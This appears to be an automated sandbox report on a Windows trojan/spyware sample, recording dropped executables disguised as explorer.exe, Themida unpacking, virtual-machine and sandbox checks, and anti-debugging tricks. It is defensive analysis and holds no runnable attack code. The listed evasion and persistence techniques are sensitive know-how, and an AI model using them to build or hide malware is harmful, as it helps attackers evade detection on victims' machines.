                      Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49776 version: TLS 1.2
                      Source: MVB56JJDeJ.exe, 00000000.00000002.731957420.000000000097A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      System Summary:

                      barindex
                      PE file contains section with special charsShow sources
                      Source: 123.exe.0.drStatic PE information: section name:
                      Source: 123.exe.0.drStatic PE information: section name:
                      Source: 123.exe.0.drStatic PE information: section name:
                      Source: explorer.exe.7.drStatic PE information: section name:
                      Source: explorer.exe.7.drStatic PE information: section name:
                      Source: explorer.exe.7.drStatic PE information: section name:
                      Source: MVB56JJDeJ.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeCode function: 0_2_0057B54F
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeCode function: 0_2_00585780
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeCode function: 0_2_0057D3AD
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeCode function: 0_2_0050B350
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeCode function: 0_2_00560700
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeCode function: 0_2_005799A0
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeCode function: 0_2_0019AE1D
                      Source: C:\Users\user\AppData\Local\Temp\123.exeCode function: 7_2_05612C68
                      Source: C:\Users\user\AppData\Local\Temp\123.exeCode function: 7_2_05612C58
                      Source: C:\Users\user\AppData\Local\Temp\123.exeCode function: 7_2_05612F20
                      Source: C:\Users\user\AppData\Local\Temp\123.exeCode function: 7_2_05612F12
                      Source: 123.exe.0.drStatic PE information: Resource name: DATA type: PE32 executable (native) Intel 80386, for MS Windows
                      Source: 123.exe.0.drStatic PE information: Resource name: DATA type: PE32+ executable (native) x86-64, for MS Windows
                      Source: 123.exe.0.drStatic PE information: Resource name: DATA type: PE32 executable (native) Intel 80386, for MS Windows
                      Source: 123.exe.0.drStatic PE information: Resource name: DATA type: PE32+ executable (native) x86-64, for MS Windows
                      Source: 123.exe.0.drStatic PE information: Resource name: DATA type: PE32 executable (native) Intel 80386, for MS Windows
                      Source: 123.exe.0.drStatic PE information: Resource name: DATA type: PE32+ executable (native) x86-64, for MS Windows
                      Source: 123.exe.0.drStatic PE information: Resource name: DATA type: PE32 executable (native) Intel 80386, for MS Windows
                      Source: 123.exe.0.drStatic PE information: Resource name: DATA type: PE32+ executable (native) x86-64, for MS Windows
                      Source: explorer.exe.7.drStatic PE information: Resource name: DATA type: PE32 executable (native) Intel 80386, for MS Windows
                      Source: explorer.exe.7.drStatic PE information: Resource name: DATA type: PE32+ executable (native) x86-64, for MS Windows
                      Source: explorer.exe.7.drStatic PE information: Resource name: DATA type: PE32 executable (native) Intel 80386, for MS Windows
                      Source: explorer.exe.7.drStatic PE information: Resource name: DATA type: PE32+ executable (native) x86-64, for MS Windows
                      Source: explorer.exe.7.drStatic PE information: Resource name: DATA type: PE32 executable (native) Intel 80386, for MS Windows
                      Source: explorer.exe.7.drStatic PE information: Resource name: DATA type: PE32+ executable (native) x86-64, for MS Windows
                      Source: explorer.exe.7.drStatic PE information: Resource name: DATA type: PE32 executable (native) Intel 80386, for MS Windows
                      Source: explorer.exe.7.drStatic PE information: Resource name: DATA type: PE32+ executable (native) x86-64, for MS Windows
                      Source: MVB56JJDeJ.exeBinary or memory string: OriginalFilename vs MVB56JJDeJ.exe
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733981566.0000000003112000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamechrome.exe< vs MVB56JJDeJ.exe
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733981566.0000000003112000.00000004.00000001.sdmpBinary or memory string: m,\\StringFileInfo\\040904B0\\OriginalFilename vs MVB56JJDeJ.exe
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733981566.0000000003112000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameIEXPLORE.EXE.MUID vs MVB56JJDeJ.exe
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733981566.0000000003112000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameIEXPLORE.EXED vs MVB56JJDeJ.exe
                      Source: MVB56JJDeJ.exe, 00000000.00000002.731038018.0000000000160000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameKelson.exe4 vs MVB56JJDeJ.exe
                      Source: MVB56JJDeJ.exe, 00000000.00000002.733264935.0000000002EF0000.00000004.00000001.sdmpBinary or memory string: OriginalFileName vs MVB56JJDeJ.exe
                      Source: MVB56JJDeJ.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: MVB56JJDeJ.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: MVB56JJDeJ.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 123.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: 123.exe.0.drStatic PE information: Resource name: RT_ACCELERATOR type: Android binary XML
                      Source: explorer.exe.7.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: explorer.exe.7.drStatic PE information: Resource name: RT_ACCELERATOR type: Android binary XML
                      Source: MVB56JJDeJ.exeStatic PE information: Section: .data ZLIB complexity 0.997998316644
                      Source: 123.exe.0.drStatic PE information: Section: ZLIB complexity 0.996143830128
                      Source: 123.exe.0.drStatic PE information: Section: . ZLIB complexity 1.00238715278
                      Source: explorer.exe.7.drStatic PE information: Section: ZLIB complexity 0.996143830128
                      Source: explorer.exe.7.drStatic PE information: Section: . ZLIB complexity 1.00238715278
                      Source: MVB56JJDeJ.exeVirustotal: Detection: 39%
                      Source: MVB56JJDeJ.exeReversingLabs: Detection: 39%
                      Source: MVB56JJDeJ.exeStatic PE information: Section: .text IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_CNT_CODE, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\MVB56JJDeJ.exe 'C:\Users\user\Desktop\MVB56JJDeJ.exe'
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess created: C:\Users\user\AppData\Local\Temp\123.exe 'C:\Users\user\AppData\Local\Temp\123.exe'
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess created: C:\Users\user\AppData\Local\Temp\123.exe 'C:\Users\user\AppData\Local\Temp\123.exe'
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeFile created: C:\Users\user\AppData\Local\YandexJump to behavior
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeFile created: C:\Users\user\AppData\Local\Temp\123.exeJump to behavior
                      Source: 123.exe.0.drBinary string: \DosDevices\BOOTSTARTUP_DeviceName\Device\BOOTSTARTUP_DeviceNameH
                      Source: 123.exe.0.drBinary string: \DosDevices\BOOTSTARTUP_S_DeviceName\Device\BOOTSTARTUP_S_DeviceNameH
                      Source: 123.exe.0.drBinary string: \DosDevices\BOOTSTARTUP_S_DeviceName\Device\BOOTSTARTUP_S_DeviceNameRSDS
                      Source: 123.exe.0.drBinary string: \DosDevices\BOOTSTARTUP_DeviceName\Device\BOOTSTARTUP_DeviceNameRSDS-
                      Source: 123.exe.0.drBinary string: \DosDevices\BOOTSTARTUP_DeviceName\Device\BOOTSTARTUP_DeviceNameRSDS
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/4@2/3
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Local\Temp\123.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Local\Temp\123.exeMutant created: \Sessions\1\BaseNamedObjects\22ef1dfc122a19967c8d94be88621f7e9801dd2c
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Binary string: e:\workfolders\5.0\sys\bootstartup\bootstartup\objfre_wnet_amd64\amd64\BootStartup.pdb source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.dr
                      Source: Binary string: d:\winapps\5.0\sys\bootstartup\bootstartup\objfre_wxp_x86\i386\BootStartup.pdb source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.dr
                      Source: Binary string: e:\workfolders\5.0\sys\bootstartup\bootstartup\objfre_wxp_x86\i386\BootStartup.pdb source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.dr
                      Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: 123.exe, 00000007.00000002.924437992.0000000000220000.00000040.00020000.sdmp
                      Source: Binary string: d:\winapps\5.0\sys\bootstartup\bootstartup\objfre_wxp_x86\i386\BootStartup.pdb source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.dr
                      Source: Binary string: d:\winapps\5.0\sys\bootstartup\bootstartup\objfre_wnet_amd64\amd64\BootStartup.pdb source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.dr
                      Source: Binary string: e:\workfolders\5.0\sys\bootstartup\bootstartup\objfre_wxp_x86\i386\BootStartup.pdb source: 123.exe, 00000007.00000000.727794455.00000000008AA000.00000002.00020000.sdmp, 123.exe.0.dr
                      Source: Binary string: C:\Files\Crypter\NmL3Irm4QMpJZ0SFUU67\Release\HostingCLR.pdb source: MVB56JJDeJ.exe

                      Data Obfuscation:

                      barindex
                      Detected unpacking (changes PE section rights)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\123.exeUnpacked PE file: 7.2.123.exe.120000.0.unpack :ER; :R; :R;.idata:W;.:R;.themida:EW;.boot:ER;.:ER;.rsrc:R; vs :ER; :R; :R;
                      Detected unpacking (creates a PE file in dynamic memory)Show sources
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeUnpacked PE file: 0.2.MVB56JJDeJ.exe.190000.2.unpack
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeCode function: 0_2_00586CF0 push dword ptr [eax+04h]; ret
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeCode function: 0_2_0019C47C pushad ; retf 0019h
                      Source: C:\Users\user\AppData\Local\Temp\123.exeCode function: 7_2_05612BA9 push ecx; retf
                      Source: MVB56JJDeJ.exeStatic PE information: section name: .eh_fram
                      Source: 123.exe.0.drStatic PE information: section name:
                      Source: 123.exe.0.drStatic PE information: section name:
                      Source: 123.exe.0.drStatic PE information: section name:
                      Source: 123.exe.0.drStatic PE information: section name: .
                      Source: 123.exe.0.drStatic PE information: section name: .themida
                      Source: 123.exe.0.drStatic PE information: section name: .boot
                      Source: 123.exe.0.drStatic PE information: section name: .
                      Source: explorer.exe.7.drStatic PE information: section name:
                      Source: explorer.exe.7.drStatic PE information: section name:
                      Source: explorer.exe.7.drStatic PE information: section name:
                      Source: explorer.exe.7.drStatic PE information: section name: .
                      Source: explorer.exe.7.drStatic PE information: section name: .themida
                      Source: explorer.exe.7.drStatic PE information: section name: .boot
                      Source: explorer.exe.7.drStatic PE information: section name: .
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeCode function: 0_2_00501340 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,atexit,
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .boot
                      Source: explorer.exe.7.drStatic PE information: real checksum: 0x3507a6 should be: 0x34c358
                      Source: MVB56JJDeJ.exeStatic PE information: real checksum: 0xba5a1 should be: 0xd749b
                      Source: 123.exe.0.drStatic PE information: real checksum: 0x3507a6 should be: 0x34c358
                      Source: initial sampleStatic PE information: section name: entropy: 7.97202180708
                      Source: initial sampleStatic PE information: section name: . entropy: 7.38298039618
                      Source: initial sampleStatic PE information: section name: entropy: 7.97202180708
                      Source: initial sampleStatic PE information: section name: . entropy: 7.38298039618

                      Persistence and Installation Behavior:

                      barindex
                      Drops PE files with benign system namesShow sources
                      Source: C:\Users\user\AppData\Local\Temp\123.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\explorer.exeJump to dropped file
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeFile created: C:\Users\user\AppData\Local\Temp\123.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\123.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\explorer.exeJump to dropped file
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\123.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\123.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\123.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\123.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\123.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\123.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\123.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\123.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\123.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\123.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\123.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\123.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\123.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\123.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\123.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\123.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\123.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\123.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\123.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\123.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\123.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\123.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\123.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\123.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\123.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Query firmware table information (likely to detect VMs)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\123.exeSystem information queried: FirmwareTableInformation
                      Tries to detect sandboxes / dynamic malware analysis system (registry check)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\123.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exe TID: 7016Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\123.exe TID: 3984Thread sleep count: 5185 > 30
                      Source: C:\Users\user\AppData\Local\Temp\123.exeThread sleep count: Count: 5185 delay: -5
                      Source: C:\Users\user\AppData\Local\Temp\123.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeWindow / User API: threadDelayed 894
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeWindow / User API: threadDelayed 8036
                      Source: C:\Users\user\AppData\Local\Temp\123.exeWindow / User API: threadDelayed 5185
                      Source: C:\Users\user\AppData\Local\Temp\123.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                      Source: C:\Users\user\AppData\Local\Temp\123.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                      Source: C:\Users\user\AppData\Local\Temp\123.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeCode function: 0_2_00588240 FindFirstFileA,_errno,GetLastError,_errno,_errno,_errno,_errno,_errno,
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeCode function: 0_2_00194EEF FindFirstFileExW,
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\123.exeSystem information queried: ModuleInformation
                      Source: C:\Users\user\AppData\Local\Temp\123.exeFile Volume queried: C:\ FullSizeInformation
                      Source: MVB56JJDeJ.exe, 00000000.00000002.732183325.0000000000A4C000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ

                      Anti Debugging:

                      barindex
                      Hides threads from debuggersShow sources
                      Source: C:\Users\user\AppData\Local\Temp\123.exeThread information set: HideFromDebugger
                      Tries to detect sandboxes and other dynamic analysis tools (window names)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\123.exeOpen window title or class name: regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\123.exeOpen window title or class name: gbdyllo
                      Source: C:\Users\user\AppData\Local\Temp\123.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\123.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\123.exeOpen window title or class name: procmon_window_class
                      Source: C:\Users\user\AppData\Local\Temp\123.exeOpen window title or class name: ollydbg
                      Source: C:\Users\user\AppData\Local\Temp\123.exeOpen window title or class name: filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\123.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeCode function: 0_2_00194862 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeCode function: 0_2_00501340 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,atexit,
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeCode function: 0_2_00196D56 GetProcessHeap,
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\123.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeCode function: 0_2_00193947 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\MVB56JJDeJ.exeCode function: 0_2_00195C25 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\123.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\123.exeProcess queried: DebugObjectHandle
                      Source: C:\Users\user\AppData\Local\Temp\123.exeProcess queried: DebugPort
